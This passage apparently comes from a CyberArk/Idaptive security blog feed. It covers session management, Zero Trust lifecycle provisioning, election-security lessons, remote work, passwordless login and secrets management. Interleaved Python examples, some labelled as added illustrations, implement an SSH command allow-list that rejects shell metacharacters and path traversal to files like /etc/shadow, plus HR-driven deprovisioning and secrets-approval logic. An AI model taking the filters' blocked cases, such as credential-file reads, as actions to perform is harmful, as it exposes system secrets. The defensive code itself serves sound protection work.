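        r"systemctl (status|restart|reload) \S+",
        r"journalctl( -[a-z] \S+)*",
        r"cat /var/log/\S+",
        r"df( -h)?",
        r"uptime",
    ],
}

# Shell metacharacters are refused outright: the allow list describes single
# commands, so chaining, redirection and substitution must never reach a shell.
_SHELL_META = re.compile(r"[;&|<>`$(){}\n]")


@dataclass(frozen=True)
class Decision:
    allowed: bool
    reason: str
    argv: tuple  # tokens to execute when allowed, empty when refused


def evaluate(role, raw_command):
    """Decide whether `role` may run `raw_command`; never executes anything."""
    if not raw_command or not raw_command.strip():
        return Decision(False, "no command: interactive shell is not permitted", ())
    if _SHELL_META.search(raw_command):
        return Decision(False, "shell metacharacter in command", ())
    try:
        tokens = shlex.split(raw_command)
    except ValueError as exc:  # unbalanced quotes
        return Decision(False, f"unparseable command: {exc}", ())
    if any(".." in tok for tok in tokens):  # keep cat /var/log/... inside /var/log
        return Decision(False, "path traversal in argument", ())
    command = " ".join(tokens)  # collapses whitespace so patterns stay simple
    for pattern in POLICY.get(role, []):
        if re.fullmatch(pattern, command):
            return Decision(True, f"matched role '{role}' rule {pattern!r}", tuple(tokens))
    return Decision(False, f"not in allow list for role '{role}'", ())


def audit_record(user, role, raw_command, decision):
    """One JSON line per request, allowed or not, for the session log."""
    return json.dumps({
        "ts": int(time.time()), "user": user, "role": role,
        "requested": raw_command, "allowed": decision.allowed, "reason": decision.reason,
    })


def main():
    role = sys.argv[1] if len(sys.argv) > 1 else "none"
    user = os.environ.get("USER", "?")
    raw = os.environ.get("SSH_ORIGINAL_COMMAND", "")
    decision = evaluate(role, raw)
    # Assumption: sshd's stderr for ForceCommand goes to the session log collector.
    print(audit_record(user, role, raw, decision), file=sys.stderr)
    if not decision.allowed:
        print(f"denied: {decision.reason}", file=sys.stderr)
        sys.exit(126)
    os.execvp(decision.argv[0], list(decision.argv))  # exec argv directly; no shell


if __name__ == "__main__":
    main()
```

Wire it in with a `Match Group ops-readonly` block in sshd_config whose `ForceCommand` line runs the script with `ops-readonly` as its argument; sshd then sets `SSH_ORIGINAL_COMMAND` to whatever the client requested, and an empty value (a plain `ssh host`) is refused rather than dropping the user into a shell. Two checks carry most of the weight: shell metacharacters are rejected before any pattern matching, and `..` is rejected so that an allowed `cat /var/log/...` cannot be turned into a read of `/etc/shadow`. The script also execs the parsed argv directly instead of handing a string to a shell, so an allowed command cannot grow extra behaviour on the way to execution.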

Here’s how it works.

Figure 2: CyberArk Privileged Session Manager for SSH


Workflow 3: CyberArk Privileged Session Manager for Web

CyberArk Privileged Session Manager for Web provides true native, secure access to all major cloud platforms and web applications.

Organizations can trace user actions by creating a record of activity on cloud console administrative accounts, business critical applications like Salesforce and DevOps tools like OpenShift. Actions are traced directly back to individual authorized users to ensure accountability. This also helps identify weak areas of security and rogue employees who may be performing malicious activities. As with all CyberArk Privileged Session Manager use cases, organizations can assign risk scores to cloud console sessions and automatically alert security operations teams on high-risk activities.

The CyberArk solution supports all major cloud consoles and, with our Universal Connector Generator, organizations can easily create a web connector to support other platforms and custom—or proprietary—applications.

Let’s look at the workflow.

Figure 3: CyberArk Privileged Session Manager for Web


With CyberArk, you can implement secure, native access to Windows, UNIX and Linux, cloud, SaaS and web applications, social media and more. Learn more about unifying risk-based session review, mitigation and audit across hybrid environments while maximizing user productivity in our on-demand webinar or by requesting a demo.

“Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma. https://www.cyberark.com/blog/should-i-stay-or-should-i-go-artificial-intelligence-and-the-clash-has-the-answer-to-your-employee-access-dilemma/ Tue, 14 Apr 2020 20:02:42 +0000 https://www.cyberark.com/?p=98933

What happens when employees have access to data, apps or services that they shouldn’t? Best case scenario: they might know the salaries of all their colleagues and company execs. Worst case scenario: malicious actors exploit that access and extract sensitive business data, causing millions of dollars in damage and irreparable harm to brand reputation.

In past blogs, I wrote how security starts with protecting users and that by verifying the user we greatly reduce the attack surface from “all humans” to just those you actually trust (aka your employees). I also wrote that we want to make sure every device is being used in a secure manner. In other words, by validating every device, we reduce the attack surface even more by limiting the devices that gain access from billions of computers, phones, or tablets to just the select few in the user’s possession.

Verifying users and validating devices represent steps one and two on the road to Zero Trust. But while this combination drastically improves security posture, more layers are necessary before the risk of fraudulent access is truly under control. Just because a person is who they say they are — and is using a trusted device — doesn’t mean that they should have broad access rights beyond what they need to do their job. Whether by accident or malicious intent, insiders can still misuse their access — or share access with people whom they shouldn’t.

To stop this from happening, you need to vastly reduce the risk associated with the access rights each user has. We do this by limiting user access (even to verified users and validated devices) to only those apps and resources that they need to do their job, and to only when they specifically need to do it. This is step number three that completes the trinity of a Zero Trust security approach: “Verify every user, validate their devices, and intelligently limit their access.”

“One day it’s fine, the next it’s black.” (The accumulation of access creates huge dangers.)

Companies typically grant access to necessary apps and resources as they onboard employees.  When an employee moves on, either up the ranks or out the door, we tend to forget about those original grants. We’re all guilty of this. For example, I’m now head of marketing at Idaptive, so I shouldn’t have access to our product source code the same way I did back when I was a product manager. The accumulation of access to data, apps, and services creates serious risks. Instead, we must tailor that access to just what a person needs for the job they perform today — and automatically remove that access when they leave.

That’s easier said than done for IT teams (and sometimes HR) who historically had to manually provision and deprovision users — or at least manually write the rules for role-based access control programs. Someone had to tell IT that an employee’s role had changed, and then IT would have to figure out how that relates to the access that they should or shouldn’t have. We often refer to this process as “lifecycle management,” and provisioning is just one piece of this mammoth responsibility that enterprise teams are tasked with managing.

The role of lifecycle management in the Zero Trust model is critically important because it determines who has which rights on which systems and applications. You can ensure that a user only has access to what he needs to do his job, create reliable reports, and audit those rights at any given time.

IT staff knows that accounts are difficult to manage because:

  1. Employees are often given more access than they need.
  2. Access frequently follows them through the course of their tenure at an organization.
  3. They amass more and more rights over time — even as their positions and roles change.
  4. Unused accounts and accounts for employees and other users who no longer need them also tend to stay around longer than they should.

Some form of automation and automatic deprovisioning is required. Combining self-service, workflow, and provisioning automation can ensure that users only receive the access they need, help them be productive quickly, and automatically remove their access as their roles change or when they leave the company.

Even if you don’t have hands-on experience with lifecycle management, it’s not hard to see how this spreadsheet-style or “swivel chair” approach to provisioning access can snowball into something both time-consuming and error-prone — leading to an accumulation of access over time. And when employees have access to things they shouldn’t, attackers know that a simple phishing attempt is all it takes to gain insider access and wreak havoc on business systems.

“You Gotta Let Me Know.” (Provisioning and Lifecycle Management enhances visibility and control.)  

If you’re saying right now “there has to be a secure, more efficient and maybe even automated way to do this,” you’d be right. The answer lies within a Zero Trust approach powered by Next-Gen Access identity technology.

With Provisioning and Lifecycle Management you can enable users to request access to applications from the app catalog of pre-integrated applications, provide specific users the ability to approve or reject these access requests, and automatically create, update, and deactivate accounts based on roles in your user directory.  Provisioning enables users to be productive on day one with the appropriate access, authorization, and client configuration across their devices.

Lifecycle Management should also seamlessly import identities from your preferred HR system or application, including Workday, UltiPro, BambooHR, or SuccessFactors, and provision them (typically) to Active Directory. This enables you to unify your provisioning and HR workflows and have an HR-driven primary system of record for user data across all your applications.

By way of example, with Active Directory (AD) synchronization for Microsoft Office 365, you can keep your AD accounts and Office 365 accounts in sync and automatically provision and deprovision user accounts, groups, and group memberships to simplify Office 365 license management.
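The HR-driven provisioning the paragraphs above describe comes down to a reconciliation between the system of record and the directory. The following is an added example, not Idaptive’s lifecycle management code: it computes the joiner, mover and leaver actions from a constructed HR feed, a role-to-entitlement map and a constructed directory state, all of which are assumptions for the example. It also handles the case the post warns about, a mover who still holds the access of a previous role.

```python
"""Joiner/mover/leaver reconciliation driven by an HR system of record.

Added illustration, not the Idaptive (CyberArk) lifecycle-management product.
It computes the provisioning actions that bring directory/application
entitlements in line with each person's *current* HR role, including revoking
what an earlier role granted. Role map, HR feed and directory state are
constructed sample data.
"""
from dataclasses import dataclass

# Role -> application entitlements (assumed, illustrative).
ROLE_ENTITLEMENTS = {
    "product-manager": {"jira", "confluence", "source-repo"},
    "marketing-lead": {"salesforce", "confluence"},
    "sre": {"source-repo", "cloud-console", "pagerduty"},
}

# Constructed HR feed: the authoritative record of who works here and in what role.
HR_RECORDS = [
    {"employee_id": "E100", "login": "jsmith", "role": "marketing-lead", "status": "active"},
    {"employee_id": "E101", "login": "akhan", "role": "sre", "status": "active"},
    {"employee_id": "E102", "login": "bwong", "role": "product-manager", "status": "terminated"},
    {"employee_id": "E103", "login": "cnew", "role": "sre", "status": "active"},
]

# Constructed directory state: what each account can reach today.
DIRECTORY_STATE = {
    # moved from product-manager to marketing-lead, still holds the old PM access
    "jsmith": {"enabled": True, "apps": {"jira", "confluence", "source-repo", "salesforce"}},
    "akhan": {"enabled": True, "apps": {"source-repo", "cloud-console", "pagerduty"}},
    "bwong": {"enabled": True, "apps": {"jira", "confluence", "source-repo"}},  # has left
    "svc-legacy": {"enabled": True, "apps": {"cloud-console"}},  # no HR record at all
}


@dataclass(frozen=True)
class Action:
    kind: str        # create | enable | disable | grant | revoke
    login: str
    apps: frozenset  # entitlements the action applies to (empty for enable/disable)


def reconcile(hr_records, directory):
    """Return the actions that align the directory with HR; inputs are not modified."""
    actions = []
    seen = set()
    for rec in hr_records:
        login, active = rec["login"], rec["status"] == "active"
        seen.add(login)
        desired = frozenset(ROLE_ENTITLEMENTS.get(rec["role"], ())) if active else frozenset()
        current = directory.get(login)
        if current is None:
            if active:  # joiner: account does not exist yet
                actions.append(Action("create", login, desired))
            continue
        held = frozenset(current["apps"])
        if not active:  # leaver: disable first, then strip everything it held
            if current["enabled"]:
                actions.append(Action("disable", login, frozenset()))
            if held:
                actions.append(Action("revoke", login, held))
            continue
        if not current["enabled"]:
            actions.append(Action("enable", login, frozenset()))
        if desired - held:
            actions.append(Action("grant", login, desired - held))
        if held - desired:  # mover: access the current role does not justify
            actions.append(Action("revoke", login, held - desired))
    # Accounts with no HR owner cannot be justified by any role: disable them
    # and let a human review rather than silently leaving them enabled.
    for login, current in directory.items():
        if login not in seen and current["enabled"]:
            actions.append(Action("disable", login, frozenset()))
    return actions


if __name__ == "__main__":
    for action in reconcile(HR_RECORDS, DIRECTORY_STATE):
        print(f"{action.kind:8} {action.login:12} {sorted(action.apps)}")
```

The order of the leaver actions matters in practice: disable the account before revoking application entitlements so that a half-finished run never leaves a departed user with a working login. The orphan account (`svc-legacy`) is the other case worth noticing: nothing in HR justifies it, so the safe default is to disable and review rather than to guess an owner.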

Lifecycle Management not only can save IT teams a great deal of time and frustration, but it can ultimately save companies from crippling data breaches. Such is the power of intelligently limiting access as part of a Zero Trust framework.


Read the Zero Trust series here:

Zero Trust Series – 1  What Is Zero Trust and Why Is it So Important?

Zero Trust Series – 2 Like the Night King, Perimeter Defense is Dead

Zero Trust Series – 3 Imposter Syndrome: Why You Can’t Separate the “Good Guys” from the “Bad Guys”

Zero Trust Series – 4 Passwords are Just one Piece of the Cybersecurity Puzzle

Zero Trust Series – 5 The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance

Zero Trust Series – 6 Protect, Detect, Deter, Respond is Not a Security Strategy.

Zero Trust Series – 7 Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust

Zero Trust Series – 8 Next-Gen Access and Zero Trust are the PB&J of Security

Zero Trust Series – 9 Passwords Need Fixing. Zero Trust is the Solution.

Zero Trust Series – 10 The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device.

Zero Trust Series – 11 “Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma.

Zero Trust Series – 12 Grow Up! Plotting Your Path Along the Zero Trust Maturity Model

HBO’s Kill Chain Shows Weaknesses in U.S. Election Security https://www.cyberark.com/blog/hbos-kill-chain-documentary-exposes-key-weaknesses-u-s-election-security/ Tue, 14 Apr 2020 13:49:15 +0000 https://www.cyberark.com/?p=89173

Are America’s elections safe from cyberattacks? The answer, according to HBO’s recent documentary Kill Chain: The Cyber War on America’s Elections, is a resounding no.

Kill Chain examines past cyberattacks on election infrastructure, as well as vulnerabilities in voting systems that are slated for use in 2020 federal, state and local elections. The documentary follows cybersecurity researchers, U.S. politicians, and even attackers who have hacked systems used in previous elections. Collectively, the experts agree: current U.S. election technology is immensely vulnerable.

A key weakness that is highlighted time and time again: Unsecured privileged access to election systems. Exploitation of privileged credentials is one of the most widely utilized attack vectors in cyberattacks today. And the reason is simple. Once attackers have a foothold into the network, they can use these credentials to escalate privileges and move laterally. In the case of IT infrastructure supporting elections, an attacker could gain access to a single computer and infect additional machines – eventually being able to execute a complete network takeover.

As someone with a strong professional and personal interest in cybersecurity, this documentary really emphasized the need for better security and data privacy education, not just in our elections but also in daily life. Several of the identified attacks could have been prevented by following basic cybersecurity best practices. For those of you who haven’t seen the documentary, I’ll be cautious of spoilers, but let’s dig into how privileged access management solutions can protect against the weaknesses of U.S. election technology.

Prevent Credential Theft – The Entry Point of the 2016 Election Assistance Commission Breach

In December 2016, the Election Assistance Commission (EAC), the federal government organization overseeing election security, revealed that its database had been breached by attackers affiliated with a nation-state.

Stolen privileged credentials from an EAC administrator were the attacker’s entry point. Kill Chain interviews the administrator whose credentials were used to access EAC systems, who claims he may have been targeted for credential theft since he was “the new guy,” having just joined EAC. While user management and onboarding tasks can be intensive workloads, securing the privileged credentials of new employees is essential to the success of any privileged access management (PAM) program.

Modern privileged access management solutions can secure and automatically rotate privileged credentials and isolate them to help prevent credential theft. Automatic discovery capabilities can also help ensure all privileged accounts are managed through the solution, including the onboarding of new employees and revoking privileges of former employees.

Stop Lateral and Vertical Movement – The Dangers of a Nation-State Attack

Kill Chain makes the point that once nation-state attackers had a foothold in the EAC database, they were able to move laterally to the server hosting all election data. Once in control of this server, they could wipe all voting data, essentially rendering the election meaningless.

In this case, the attacker downloaded voting data and sold it to the highest bidder, another foreign government. But effectively, the EAC’s lack of controls rendered our election systems vulnerable to multiple foreign actors. As the EAC administrator stated, once in control of the server, “they can do whatever they want to that database.”

Elsewhere, Kill Chain points out that despite frequent claims otherwise, voting systems are heavily networked. Nationally, voter registration is linked to the internet for easy enrollment, while voting machines communicate over local area networks (LANs) that are heavily susceptible to attack. Lateral attacker movement between these machines could compromise entire polling centers, allowing less sophisticated attackers, such as organized crime groups, to manipulate their local elections.

Privileged access management best practices can enhance election security by helping stop lateral and vertical movement. Session isolation capabilities can limit a compromised credential’s range of motion to a single system, session monitoring provides visibility into privilege-related activity and automatic credential rotation capabilities notably constrain an attacker’s window of opportunity. Finally, privileged access management can support Zero Trust frameworks and just-in-time privilege elevation to allow users to access privileged accounts only on a temporary, as needed basis.

Limit Privilege Escalation and Abuse – Securing the Local Election Infrastructure

One of the most interesting parts of Kill Chain is an interview with one anonymous attacker who successfully escalated privileges to gain root access to Alaska’s main election server in the 2016 federal election. The attacker claims that once in control of the server, he “felt like God,” and could have changed live voting data or even removed candidates from the ballot. The documentary even hints the attacker may have intended to use Alaskan systems as a steppingstone to federal systems.

The documentary stops short of making this accusation, but the point is clear: U.S. election security infrastructure fails to contain privilege escalation.

Elsewhere, Kill Chain explores the various vulnerabilities of the three most popular voting systems, which run on woefully out-of-date operating systems like Microsoft Windows 7.* The documentary even cites a U.S. Air Force penetration tester who specifically names easy privilege escalation as an unforgivable vulnerability of one vendor’s polling computers.

Privileged access management solutions that reinforce the principle of least privilege, in which each privileged account is granted only the permissions it needs – no more and no less – are a good starting point. Further, privileged threat analytics can automatically detect anomalous activity, alert on it and trigger an automatic response to high-severity incidents, taking remedial action to stop attacks.

While Kill Chain, which ultimately argues for paper ballots, shows that there are significant U.S. election security threats outside the realm of privileged access management, the documentary makes it clear that better privilege-related controls are needed across American election infrastructure. And while this documentary focused solely on election security, these attacks could very easily translate into any business that holds sensitive data. No matter the organization, a modern privileged access management program is essential to developing a strong cybersecurity posture.

Interested in learning more? Check out the CyberArk Blueprint for Privileged Access Management Success with this white paper and on-demand webinar.

*Note: Microsoft has adjusted its end-of-support for Windows 7 to protect machines used in the 2020 election cycle.

Tackling the Cybersecurity Challenges of Our “New Normal” https://www.cyberark.com/blog/tackling-the-cybersecurity-challenges-of-our-new-normal/ Thu, 09 Apr 2020 12:58:26 +0000 https://www.cyberark.com/?p=88844

Within one short month, “business as usual” has become anything but. Millions of workers have shifted to remote work, been redeployed to focus on evolving business priorities, or face general uncertainty about their jobs. As IT teams work around the clock to execute business continuity plans, cyber attackers have been working just as hard and fast to exploit weaknesses in these dynamic and changing environments.

Through my regular conversations with tech leaders, it’s clear that staying ahead of known and emerging threats in this new landscape has added even more levels of complexity to an already complicated job. CIOs and CISOs at organizations everywhere are looking for the best way to handle these challenges while keeping employees safe and productive. As they navigate this “new normal,” there are three fundamental areas that are emerging as key priorities for security leaders across critical people, process and technology dimensions:

Securing People

While remote work was growing in popularity before it became a necessity, there are still many people across industries like government, finance and education who have never had to work like this before. They’re now forced to navigate a completely different way of getting their jobs done. At the same time, they’re “homeschooling” their kids, caring for aging parents, poring over the internet for the latest news on the unfolding situation and trying to snag an elusive time slot for grocery delivery. Needless to say, with everything else on their minds, security can be an afterthought—and attackers know this. Attackers have launched a wave of phishing, ransomware and social engineering campaigns taking advantage of the confusion and distraction. Some cyberattack attempts are seemingly work-related—like a phony email from IT asking the user to click on a link as part of a set-up process—while some make emotional appeals looking for support of a “noble cause” or use government stimulus or other financial incentives as the hook.

Securing Devices and Applications

IT teams had very little (if any) time to prepare for the acute spike in remote workers. Some employees were able to take their office computers home with them while others set up shop with their own technology. This surge in new and personal device use has created a host of new challenges, particularly for those organizations that did not have an existing BYOD policy in place. In the rush to get connected, misconfigurations abound and leaving new devices in their default (insecure) factory settings can put companies at risk. Attackers look for these situations to gain a foothold into the organization.

In addition, as we rely more than ever on messaging and conference calling applications to keep us connected, attackers are exploiting vulnerabilities in these systems too. Whether it’s “Zoombombing” attacks—where uninvited attendees break into and disrupt Zoom meetings—or targeting application credentials stored within web browsers, compromising popular web-based applications has become a dangerously organized effort by attackers.

Securing Connections and Access

According to a CNBC survey, 53 percent of organizations have never stress-tested their systems for an event like this. Many organizations face both security and availability challenges as hundreds of thousands of employees try to connect using virtual private networks (VPNs) to send and receive data. Compounding the issue, employees logging into their VPNs are using home WiFi networks, which are often unsecured, unmonitored and overloaded as multiple people try to work and learn remotely. Attackers can easily infect these WiFi routers with malware, making all of the household’s connected devices vulnerable—from TVs and smart thermostats to cell phones and computers.

Beyond just providing access to servers and systems for the average employee, many others need access to sensitive information and data to do their jobs. While this is particularly true of traditional roles—like IT admins who require powerful privileged access to critical systems—the number of privileged users continues to widen as employees from departments like finance and legal also need access to cloud consoles, RPA consoles and orchestration tools.

As the definition of a privileged user expands rapidly, security teams struggle to maintain visibility of what these users access—at what time and for how long—from various remote work locations. Meanwhile, many organizations have shifted responsibilities and deployed workers to perform additional or different tasks to help cover departments that may be short-handed. Some of these workers have been given elevated privileges that they’ve never had before—often without the requisite security policies in place, like automatically provisioning and de-provisioning credentials. This makes it easy for attackers to exploit the access typically granted to a powerful insider, using it to launch and execute attacks and potentially gain control over all infrastructure.

While the security issues CISOs collectively face today are not new, they are more acute than ever before. While we often talk about this “new normal” as temporary, it is very likely that it will persist long after the current situation has dissipated. Employees unaccustomed to working from home may recognize the benefits and balance remote work can bring to their lives. Similarly, their employers may realize operational efficiencies, productivity gains and employee empowerment opportunities, and allow—or even encourage—more remote work.

No matter what the future holds, the actions taken by organizations today will inform what our collective tomorrow looks like. Start by remaining hyper-vigilant and maintaining strong cybersecurity practices. From there, you can begin planning for the long game by redefining how to approach risk across people, processes and technologies.

One of the most effective places to start when it comes to risk management is managing access to privileged accounts and credentials. The greatest risk organizations face is – contrary to popular belief – not preventing the initial infiltration but containing attackers who are already inside the system. By adopting privileged access management, organizations can keep their most valuable data secure – regardless of whether their workers are in the office or at home.

To learn more, read “5 Reasons to Prioritize Privileged Access Management (PAM)” or visit CyberArk’s risk distancing resource page.

True Passwordless? Show me… https://www.cyberark.com/blog/true-passwordless-show-me/ Tue, 07 Apr 2020 18:09:30 +0000 https://www.cyberark.com/?p=99525

Passwordless is more than a buzzword. Idaptive has been granted a key patent in Passwordless technology by the United States Patent Office: Zero sign-on using a web browser.

Passwordless is a major security industry buzzword for 2020. I’m sure you have heard many identity and access management vendors touting their Passwordless technology in their blogs, press releases and conferences as being the first to market. If I were from Missouri, the “show me” state, I would insist that vendors show real innovation — more than just supporting common Passwordless authentication standards.

One of our core values at Idaptive is to back up our claims with true innovation and real intellectual property, and this last weekend brought a really nice surprise for us here at Idaptive; we have been granted a key patent in Passwordless technology by the United States Patent Office: Zero sign-on using a web browser.

Zero Sign-on (ZSO)

This patent for Zero Sign-on (ZSO), implemented in the Idaptive Next-Gen Access platform, is about eliminating passwords while delivering strong authentication to log in to any application, cloud or on-premises, through a web browser using user and device certificates. This innovation leverages two core pieces of the Idaptive platform – the cloud service and the cloud agents.

To summarize, this is how it works: when a user enrolls the device with the Idaptive platform, the Idaptive cloud endpoint agent configures all standard browsers on the device to enable ZSO via each standard browser installed on the device. After configuration, any of the browsers can create an authenticated secure connection to the Idaptive platform (and any application protected by it) without the need for the user to enter credential information such as a username or password. From the user’s point of view, the user simply requests the application in the browser and accesses it with no further input, enabling a seamless, or “silent”, login experience with the underlying security controls offered by strong certificate-based authentication.

The foundational pillars of Passwordless

In the past year or so, I’ve had the opportunity to have many discussions with our customers and prospects about what constitutes a true Passwordless solution, and the foundational pillars of such a solution. Here’s my view on the foundational pillars of a true Passwordless solution.

Pillar 1: Zero Sign-on with Passwordless multi-factor authentication

The first pillar of a true Passwordless solution is Zero sign-on, leveraging strong cryptographic standards such as certificates and combining user identities with contextual information such as device fingerprints and security posture. But ZSO, alone, is not enough. ZSO needs to be combined with one or more additional authentication factors, none of which should be passwords. With Idaptive, you can implement ZSO and layer on additional forms of authentication, such as a mobile push notification, YubiKeys or even FIDO 2-supported on-device authenticators such as TouchID and Windows Hello (hopefully not SMS OTP). In highly secure environments where privileged users are not allowed to plug in USB keys or devices, nor have other devices such as fingerprint sensors or cameras enabled on their endpoints, ZSO may be the only real form of high-assurance, cryptographic, Passwordless authentication you have available.

Pillar 2: FIDO 2 support and integration

Pillar #2 for Passwordless is Fast Identity Online (FIDO). I’m a great fan and supporter of the FIDO Alliance, and it seems, so is our industry! Almost every identity-as-a-service vendor supports FIDO 2 Web Authentication (WebAuthn), and this standard is key to enabling Passwordless authentication to typical end user machines. I’ve personally loved using FIDO 2 compliant keys from YubiKey and using my macOS TouchID to access my Idaptive-secured applications and Idaptive user portal. I also use my FIDO 2 keys as an additional factor when step-up authentication is triggered. For example, Idaptive can require multi-factor authentication when the risk level is determined to be elevated by my behavior, such as accessing an app that I haven’t used recently or from a location I don’t normally access it from.

Pillar 3: Endpoint Agent for Passwordless multi-factor authentication

The third pillar of true Passwordless is login authentication to endpoints. While technologies like Windows Hello, with which Idaptive works seamlessly today, have made it easier to eliminate passwords during endpoint login, they often come with their own share of challenges: for one, they replace the password with a PIN, which is just as easy to forget and prone to being reused for personal and corporate logins; second, they do not provide a versatile and wide range of Passwordless authenticators to work with; and third, they further lock you into using and paying a premium for Microsoft technologies, which only work on Microsoft platforms (what about all those Macs?). While the Idaptive endpoint agents require a password as one of their factors today, this restriction will be removed in future releases. In other words, Idaptive will enable login to your Windows and Mac endpoints with no passwords!

Pillar 4: Remote users Passwordless authentication to on-premises apps

Pillar number 4 is a key Passwordless use case that affects all hybrid enterprises, especially in today’s work from home environment. Remote users often use a VPN connection into the network to access on-premises applications and resources. As a key security control, you should always require users to use multi-factor authentication (MFA) when accessing the network through a VPN. Making sure this MFA is Passwordless is a key element of enabling a Passwordless environment.

NOTE: Widespread VPN usage introduces its own security and scale challenges, especially when a typical user only needs access to a handful of applications. That is why Idaptive offers VPN-less access through its App Gateway service, and you can leverage Idaptive’s ZSO and FIDO 2 support with this service to achieve true Passwordless authentication to on-premises apps.

Pillar 5: Self-service Passwordless Authenticator replacement

The last pillar of Passwordless is a solution that will offer you the ability to self-enroll, replace and delete your Passwordless authenticators with the appropriate security controls, along with a wide variety of alternative Passwordless authenticators to choose from. If a user were to lose their YubiKey, or misplace their mobile phone, they shouldn’t be dead in the water.

NOTE: With Idaptive’s self-service enrollment and management of authenticators, you can self-enroll and manage push notifications, OATH tokens, security questions, security keys, FIDO authenticators, Windows Hello or macOS TouchID, etc. So, if you forget your PIN, log in with an equally strong or stronger security key. If you lose your YubiKey, use a mobile push notification instead. Wide authenticator selection and simple self-service ensure that you will never be locked out, even in a Passwordless world!

Conclusion

So, the next time you discuss Passwordless with an identity vendor, do not hesitate to ask them about their idea of a true, holistic Passwordless solution — and what innovation and intellectual property they have invested in to make that a reality! And please let us know if they meet the “Idaptive” Passwordless standards.

For more information on Idaptive Passwordless capabilities please visit here.

]]>
Enable Developers with Self-Service Secrets Management https://www.cyberark.com/blog/enabling-developers-with-a-self-service-approach-to-secrets-management/ Tue, 07 Apr 2020 14:40:28 +0000 https://www.cyberark.com/?p=88757

With digital transformation pushing organizations to rapidly deploy new apps and services, too often, development teams can be so focused on getting the next set of features out to customers that security becomes an afterthought. So, with the widespread adoption of DevOps methodologies, how do security teams engage with developers?

One approach security teams are taking is to establish strong, effective partnerships with developers and DevOps teams, but, as with digital transformation, establishing such a partnership is a journey with multiple steps and initiatives. For example, security teams can provide developers with security solutions that make it easier for them to do the right thing. In many cases, this means providing developers with easily consumable security capabilities that can be incorporated into their automated processes.

Some security capabilities are more easily consumable than others. For example, code scanning tools can be added relatively easily to the build processes, preventing code with known viruses or other issues from being incorporated into the build. Some security testing can be automated, so that the build automatically rejects artifacts that fail. These security checks can simply be incorporated as part of the CI/CD process and, except for when a problem is detected, they’ll have minimal impact on the individual developers writing their code.

The area of secrets management is a little more challenging and possibly disruptive, as it potentially impacts each developer when they code or update apps to access databases and other sensitive resources. In this case, the developer needs to ensure each app securely accesses the resource using privileged credentials.

So, typically at run time, the app needs to be able to authenticate to the digital vault and fetch the privileged credential necessary to access the resource. A newly written application, for example, will need to be coded to get the credentials from the secrets management solution, which in turn will need to authenticate the application before handing them over.

One approach we’ve seen security teams adopt is to provide developers with a self-service solution, so developers can more easily give the apps they are writing secure access to databases and other resources.

Why Self-Service Solutions for Secrets Management?

It might seem simpler to have security work directly with the developers and update the secrets management solution themselves, making sure that each newly created app can use the secrets management solution to get the credentials it needs. While this can work in a small team, an enterprise will have too many apps and likely many more developers writing and updating apps than a security team can handle manually. In that case, self-service becomes a necessity.

One enterprise customer in the retail space needed to rapidly and cost-effectively deploy new customer applications to compete with online retailers. The security team wanted to ensure applications securely accessed databases by deploying a secrets management solution that would be able to secure the core application functions used by the business (such as inventory, procurement, stores and in-store pickup) – which consisted of thousands of Pivotal microservices.

Their developers were great at writing apps; however, with over a thousand developers and only a small security team, security was concerned that they would get overwhelmed and become a roadblock, negatively impacting the deployment of apps. So, the retailer implemented a self-service solution.

They used a Jenkins CI/CD pipeline to automatically update the secrets manager’s policies. Then, with the updated policies in place, the secrets manager only allowed approved apps to securely access databases. Once it was set up, the solution could handle developers’ requests to approve apps to securely access databases and only route exceptions to the security team.

In another example, the security team at a financial services customer with a large number of applications running on Red Hat OpenShift wanted the developers and application teams to have their applications request secrets based on policy. However, security did not want to force the development teams to write security policies. So, this company opted for a self-service solution to automate the approval process, and now when the developer’s request is approved, the security policy is automatically updated.
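The approval step that both customer examples above describe, as an added example that is not CyberArk’s or either customer’s code: a developer’s request is auto-approved only when it stays inside the team’s own secret namespace, and is turned into a policy fragment; anything else is routed to the security team as an exception. The policy shape follows Conjur’s YAML policy format as an assumption, and all team names, app names and secret paths are constructed.

```python
"""Self-service secrets access approval step (added example; constructed data)."""
from dataclasses import dataclass
import re


@dataclass
class AccessRequest:
    team: str      # taken from the CI job's identity, not from free-form user input
    app: str       # application identity that will fetch the secrets at run time
    secrets: list  # secret paths the app needs, e.g. "retail/inventory/db-password"


@dataclass
class Decision:
    approved: bool
    reason: str
    policy_yaml: str = ""
    exception_for_security: bool = False  # True => a human on the security team decides


# Constructed: the one rule the security team maintains. A team may grant its own apps
# read access to secrets under its own prefixes; anything else needs a human decision.
TEAM_SECRET_PREFIXES = {
    "retail-inventory": ("retail/inventory/", "retail/shared/"),
    "retail-stores": ("retail/stores/", "retail/shared/"),
}

APP_NAME = re.compile(r"^[a-z][a-z0-9-]{2,40}$")
# "." is not in the character class, so ".." segments cannot pass as a secret path.
SECRET_PATH = re.compile(r"^[a-z0-9][a-z0-9_-]*(/[a-z0-9][a-z0-9_-]*)+$")


def render_policy(req: AccessRequest) -> str:
    """Policy fragment (assumed Conjur-style YAML): declare the app's host identity and
    permit read/execute on each requested variable, nothing more."""
    lines = ["- !policy", f"  id: {req.team}", "  body:", f"    - !host {req.app}"]
    for path in req.secrets:
        lines += [
            "    - !permit",
            f"      role: !host {req.app}",
            "      privileges: [read, execute]",
            f"      resource: !variable /{path}",
        ]
    return "\n".join(lines) + "\n"


def evaluate(req: AccessRequest, allowed=TEAM_SECRET_PREFIXES) -> Decision:
    """Auto-approve in-scope requests; reject malformed ones; escalate the rest."""
    if not APP_NAME.fullmatch(req.app):
        return Decision(False, f"rejected: invalid app name {req.app!r}")
    malformed = [p for p in req.secrets if not SECRET_PATH.fullmatch(p)]
    if malformed:
        return Decision(False, f"rejected: malformed secret path(s) {malformed}")
    if not req.secrets:
        return Decision(False, "rejected: no secrets requested")
    prefixes = allowed.get(req.team)
    if prefixes is None:
        return Decision(False, f"team {req.team!r} has no self-service scope",
                        exception_for_security=True)
    out_of_scope = [p for p in req.secrets if not p.startswith(prefixes)]
    if out_of_scope:
        return Decision(False, f"secrets outside team scope: {out_of_scope}",
                        exception_for_security=True)
    return Decision(True, "auto-approved within team scope", render_policy(req))


if __name__ == "__main__":
    demo = AccessRequest("retail-inventory", "inventory-api",
                         ["retail/inventory/db-password", "retail/shared/tls-key"])
    decision = evaluate(demo)
    print(decision.reason)
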